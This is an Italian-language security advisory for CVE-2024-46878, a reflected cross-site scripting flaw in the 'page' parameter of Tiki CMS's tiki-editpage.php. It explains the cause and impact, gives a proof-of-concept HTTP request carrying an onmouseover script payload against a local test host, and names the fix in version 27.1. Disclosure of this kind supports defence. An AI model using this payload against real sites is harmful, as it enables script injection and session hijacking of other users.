
CVE-2024-46878 - Tiki CMS Vulnerabilità di Cross-Site Scripting riflesso (XSS)
Tiki CMS - Vulnerabilità di Cross-Site Scripting (XSS) Riflessa nel parametro 'page'
Destinato esclusivamente a scopi educativi, di ricerca e difensivi. L'uso non autorizzato contro sistemi senza permesso è illegale.
Esiste una vulnerabilità di Cross-Site Scripting (XSS) riflessa nel parametro page di tiki-editpage.php in Tiki versione 26.3 e precedenti. Questa vulnerabilità consente agli aggressori di eseguire codice JavaScript arbitrario tramite un payload creato ad hoc, portando al potenziale accesso a informazioni sensibili o ad azioni non autorizzate.
La vulnerabilità è causata da una sanificazione non corretta dell'input del parametro page in tiki-editpage.php. L'input fornito dall'utente viene riflesso nella risposta HTTP senza una codifica sufficiente, consentendo l'esecuzione di JavaScript iniettato.
Consente a un aggressore autenticato di eseguire JavaScript arbitrario nel browser di un altro utente tramite una richiesta creata ad hoc, portando potenzialmente al dirottamento della sessione o ad azioni non autorizzate.
GET /tiki-editpage.php?page=%22%20onmouseover%3Dalert(document.domain)%20 HTTP/1.1
Host: 127.0.0.1:9089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: local_tz=Asia%2FKolkata; PHPSESSIDCV=51zQV%2BMxUnJxFY9nnRP%2FFg%3D%3D; javascript_enabled=y; PHPSESSID_CSRF=t2A6i9BjH1QHEH8KaLag0jtgT4dK9TTzyn8sOcRVwg9SMycfxWjoeYFmTykOfVjNPotrBKqsizXJ%2BrYcEXci8QPZxiSyBwA5YFLRS1S2RgxeTAI%3D; PHPSESSID=e19c8b25df427a7892245dc919be2067
Upgrade-Insecure-Requests: 1
Priority: u=0, i

Il problema è stato risolto in Tiki CMS Groupware versione 27.1. Si consiglia agli utenti di aggiornare a questa o a una versione successiva con patch.
Riferimento del venditore: Nuovi aggiornamenti di sicurezza rilasciati per Tiki 27.x LTS, 26.x e 24.x LTS e l'aggiornamento è fortemente raccomandato